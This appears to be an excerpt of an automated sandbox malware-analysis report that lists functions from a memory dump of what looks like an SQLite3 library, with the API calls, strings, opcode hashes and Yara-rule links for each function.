                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_malloc$memcmpsqlite3_freesqlite3_realloc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1984881590-0
                                                                                                                                            • Opcode ID: edbb607c285be510a0029581ec814a48f17a4195f09f1808b928d548c4f35efb
                                                                                                                                            • Instruction ID: b7e8ebd232bc894cd7b58a04ebd2a0b21c00f7c03e47dda8414fbd01ead25642
                                                                                                                                            • Opcode Fuzzy Hash: edbb607c285be510a0029581ec814a48f17a4195f09f1808b928d548c4f35efb
                                                                                                                                            • Instruction Fuzzy Hash: 6CE11775A082498FDB04CF68C48169ABBF2FF8C354F258569EC14EB319D734E952CB90
                                                                                                                                            Function 61E4100E Relevance: 6.4, APIs: 4, Instructions: 407COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 61E41023
                                                                                                                                              • Part of subcall function 61E13C8E: sqlite3_mutex_try.SQLITE3(?,00000000,?,61E13CF0), ref: 61E13C2E
                                                                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 61E4103C
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 61E4114D
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 61E4150C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_mutex_try
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2068833801-0
                                                                                                                                            • Opcode ID: fd871e7ad1a16c1bf6c1541cf4dfcc969e07b7113be856a64317f61cd3fac5e4
                                                                                                                                            • Instruction ID: 9e4f52f2775dad555f984925ad3b3440f6ad06ba104db86d27a76b14720a4eff
                                                                                                                                            • Opcode Fuzzy Hash: fd871e7ad1a16c1bf6c1541cf4dfcc969e07b7113be856a64317f61cd3fac5e4
                                                                                                                                            • Instruction Fuzzy Hash: ABF1E274A042598FDF08CFA9D590A9DBBF2AF88318F25C069E815EB355DB34EC52CB50
                                                                                                                                            Function 61E34223 Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 284COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_free$sqlite3_malloc64sqlite3_mprintf$sqlite3_snprintf$sqlite3_mutex_entersqlite3_mutex_leavesqlite3_strnicmp
                                                                                                                                            • String ID: .$sqlite3_extension_init$te3_$xa
                                                                                                                                            • API String ID: 2803375525-424482150
                                                                                                                                            • Opcode ID: cb202b8eceb6f30de15bb30b08e8e28bb34aca697d6615d6736c44a28d46ec58
                                                                                                                                            • Instruction ID: be726d4b01704fde56e9b68cacbf19b1e1f688172a34803ea8e649e0dfffea3c
                                                                                                                                            • Opcode Fuzzy Hash: cb202b8eceb6f30de15bb30b08e8e28bb34aca697d6615d6736c44a28d46ec58
                                                                                                                                            • Instruction Fuzzy Hash: 59C106B0A093569FDB00DFA8C48069DBBF1BF88358F25C52AE8989B350D775D941CF42
                                                                                                                                            Function 61E25B96 Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 189COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_free$sqlite3_snprintf$sqlite3_mutex_entersqlite3_win32_is_nt
                                                                                                                                            • String ID: \$winFullPathname1$winFullPathname2$winFullPathname3$winFullPathname4
                                                                                                                                            • API String ID: 3752053736-2111127023
                                                                                                                                            • Opcode ID: 93286543eb0fbd64d52c8c53e0f58e9d4e8d012ffc5db5f85d0bfee80c2dd95c
                                                                                                                                            • Instruction ID: b63db8656d4d6d23792c9ec72844b69d9db017f3d53a38575ea04278350c5c32
                                                                                                                                            • Opcode Fuzzy Hash: 93286543eb0fbd64d52c8c53e0f58e9d4e8d012ffc5db5f85d0bfee80c2dd95c
                                                                                                                                            • Instruction Fuzzy Hash: 8D7149B0A087058FD741DF69C5942AEBBF1BF89358F64C42DE8998B354D734C8468F52
                                                                                                                                            Function 61E24534 Relevance: 28.6, APIs: 19, Instructions: 132COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_stricmp.SQLITE3 ref: 61E2454E
                                                                                                                                            • sqlite3_value_numeric_type.SQLITE3 ref: 61E2455A
                                                                                                                                            • sqlite3_value_int.SQLITE3 ref: 61E24567
                                                                                                                                            • sqlite3_stricmp.SQLITE3 ref: 61E2458F
                                                                                                                                            • sqlite3_value_numeric_type.SQLITE3 ref: 61E2459B
                                                                                                                                            • sqlite3_value_int.SQLITE3 ref: 61E245AA
                                                                                                                                            • sqlite3_stricmp.SQLITE3 ref: 61E245CA
                                                                                                                                            • sqlite3_value_numeric_type.SQLITE3 ref: 61E245D6
                                                                                                                                            • sqlite3_value_int.SQLITE3 ref: 61E245E5
                                                                                                                                            • sqlite3_stricmp.SQLITE3 ref: 61E24611
                                                                                                                                            • sqlite3_value_numeric_type.SQLITE3 ref: 61E2461D
                                                                                                                                            • sqlite3_value_int.SQLITE3 ref: 61E2462B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_stricmpsqlite3_value_intsqlite3_value_numeric_type
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2723203140-0
                                                                                                                                            • Opcode ID: 3795cbae6c260a60e902fc88a9fc257c6be7c5d9693a9bc884f1f4f58bea1516
                                                                                                                                            • Instruction ID: 7649e02206c548833b93250ede4b9a31858c656497000684f2159c33148b283b
                                                                                                                                            • Opcode Fuzzy Hash: 3795cbae6c260a60e902fc88a9fc257c6be7c5d9693a9bc884f1f4f58bea1516
                                                                                                                                            • Instruction Fuzzy Hash: 3B4118B4908B46CBD720AF65899126EBBF4FF8475CF71C92EC8868B304E734D4528B41
                                                                                                                                            Function 61E1797F Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 227COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1DEFC), ref: 61E179B6
                                                                                                                                            • sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E21778), ref: 61E179EA
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1DEFC), ref: 61E17B32
                                                                                                                                            • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1DEFC), ref: 61E17B3F
                                                                                                                                            • sqlite3_malloc.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1DEFC), ref: 61E17BC4
                                                                                                                                            • sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E21778), ref: 61E17BEA
                                                                                                                                            • sqlite3_free.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1DEFC), ref: 61E17C0C
                                                                                                                                            • sqlite3_os_init.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1DEFC), ref: 61E17C11
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1DEFC), ref: 61E17CE5
                                                                                                                                            • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1DEFC), ref: 61E17CF0
                                                                                                                                            • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1DEFC), ref: 61E17D0C
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1DEFC), ref: 61E17D21
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1DEFC), ref: 61E17D35
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_mutex_leave$sqlite3_mutex_enter$sqlite3_config$sqlite3_freesqlite3_mallocsqlite3_mutex_freesqlite3_os_init
                                                                                                                                            • String ID: @6a
                                                                                                                                            • API String ID: 1590227068-3141242769
                                                                                                                                            • Opcode ID: f5005043ba44dfdd3449d948017c6ec10384b408c65f325120fa883d2d97e120
                                                                                                                                            • Instruction ID: bc32719ed3ff1c89fd21ada1ff94782bfeb103e4cb28331d7a73d17d67bdccf6
                                                                                                                                            • Opcode Fuzzy Hash: f5005043ba44dfdd3449d948017c6ec10384b408c65f325120fa883d2d97e120
                                                                                                                                            • Instruction Fuzzy Hash: 86914C71D98A058FEF408FA8C44935D76F2BBCB709F248429C4049B3A4E779C9D5CB91
                                                                                                                                            Function 61E2552D Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 168COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_snprintf$sqlite3_result_textsqlite3_result_value
                                                                                                                                            • String ID: NULL
                                                                                                                                            • API String ID: 336169149-324932091
                                                                                                                                            • Opcode ID: a8165ed0734e617a3eb7d2e186e12fde092656e4a1aa6a645e7fab47ee6be10b
                                                                                                                                            • Instruction ID: d08389f3815a2e7e9e93c97d071f744434c803dde923877aa3eca0c125ef2f9d
                                                                                                                                            • Opcode Fuzzy Hash: a8165ed0734e617a3eb7d2e186e12fde092656e4a1aa6a645e7fab47ee6be10b
                                                                                                                                            • Instruction Fuzzy Hash: C761E270948386CFD7019F68C9A43A9BFE2AF85318F28C96CE4C88B395D735C845CB02
                                                                                                                                            Function 61E0C5BE Relevance: 16.6, APIs: 11, Instructions: 54COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2313487548-0
                                                                                                                                            • Opcode ID: cc8bbecdeb9c1dfda9548ace6e0444fd38f1078339e74ce32c513f6c2a7c387e
                                                                                                                                            • Instruction ID: c2f72618cc6c0f7f802301503beadb74b7d76ecd6ef94983025737cd66d22810
                                                                                                                                            • Opcode Fuzzy Hash: cc8bbecdeb9c1dfda9548ace6e0444fd38f1078339e74ce32c513f6c2a7c387e
                                                                                                                                            • Instruction Fuzzy Hash: 601186B4604B458BCB40EFB8C0C4419BBE4EF88325FA2C99DDC998B346E734D8A18F55
                                                                                                                                            Function 61E24198 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 177COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memcmpsqlite3_value_text$sqlite3_freesqlite3_result_textsqlite3_value_bytes
                                                                                                                                            • String ID: t6a$x6a
                                                                                                                                            • API String ID: 3386002893-961901875
                                                                                                                                            • Opcode ID: 087c252f6a6034a36f693b487c6f517c5ab180425775e666bca1c97750164f84
                                                                                                                                            • Instruction ID: 6af5fefa62bd0083cfbc49f6c94c91775fb0b41dd064eb93ab53d6658f66140f
                                                                                                                                            • Opcode Fuzzy Hash: 087c252f6a6034a36f693b487c6f517c5ab180425775e666bca1c97750164f84
                                                                                                                                            • Instruction Fuzzy Hash: 4461AB71A042558FDB01CFA9C0A069DBBF1BF8E714F29C62ED8A9AB391D730D841CB50
                                                                                                                                            Function 61E01040 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 132sleepCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            • `OaMingw-w64 runtime failure:, xrefs: 61E01135
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleep_amsg_exit
                                                                                                                                            • String ID: `OaMingw-w64 runtime failure:
                                                                                                                                            • API String ID: 1015461914-1118873892
                                                                                                                                            • Opcode ID: b64c55eeb781da2828cf949bf5f5c709f9373df9cca3e1fcf598b46e8e3d2edf
                                                                                                                                            • Instruction ID: c771c8b00231f251dfe49cf79caec3f0b220d640a5060c235311dcaf4b0d618f
                                                                                                                                            • Opcode Fuzzy Hash: b64c55eeb781da2828cf949bf5f5c709f9373df9cca3e1fcf598b46e8e3d2edf
                                                                                                                                            • Instruction Fuzzy Hash: F5419CB0A556418BEB00AFE8D58432A7AF1FFC634DF25C92ED5888B351D775C890CB92
                                                                                                                                            Function 61E186AF Relevance: 13.9, APIs: 9, Instructions: 402COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_freesqlite3_malloc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 423083942-0
                                                                                                                                            • Opcode ID: 377435d3fa47cca39a97c056bce5a2df502776b593b7c3e7010ba10327ec197e
                                                                                                                                            • Instruction ID: 4ccdfbaace8c2cfd2fa90fb703118cd59a5cb72861080560bccf724acfef8ec6
                                                                                                                                            • Opcode Fuzzy Hash: 377435d3fa47cca39a97c056bce5a2df502776b593b7c3e7010ba10327ec197e
                                                                                                                                            • Instruction Fuzzy Hash: BA02D0B4A09209CFDB04CFA8D581E8EBBF1BF48314F258559E855AB359D730E842DFA0
                                                                                                                                            Function 61E24D60 Relevance: 13.8, APIs: 9, Instructions: 341COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_value_text.SQLITE3 ref: 61E24D7F
                                                                                                                                            • sqlite3_result_error_toobig.SQLITE3 ref: 61E24E60
                                                                                                                                            • sqlite3_result_error_nomem.SQLITE3 ref: 61E24E86
                                                                                                                                            • sqlite3_snprintf.SQLITE3 ref: 61E25102
                                                                                                                                            • sqlite3_snprintf.SQLITE3 ref: 61E2512F
                                                                                                                                            • sqlite3_snprintf.SQLITE3 ref: 61E25139
                                                                                                                                            • sqlite3_snprintf.SQLITE3 ref: 61E2519F
                                                                                                                                            • sqlite3_result_text.SQLITE3 ref: 61E252C2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            • Associated: 0000000B.00000002.2864743319.0000000061E00000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865372325.0000000061E89000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865479165.0000000061E8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865545043.0000000061E8B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865659937.0000000061E9B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865691109.0000000061E9D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865741279.0000000061EA0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            • Associated: 0000000B.00000002.2865773602.0000000061EA1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
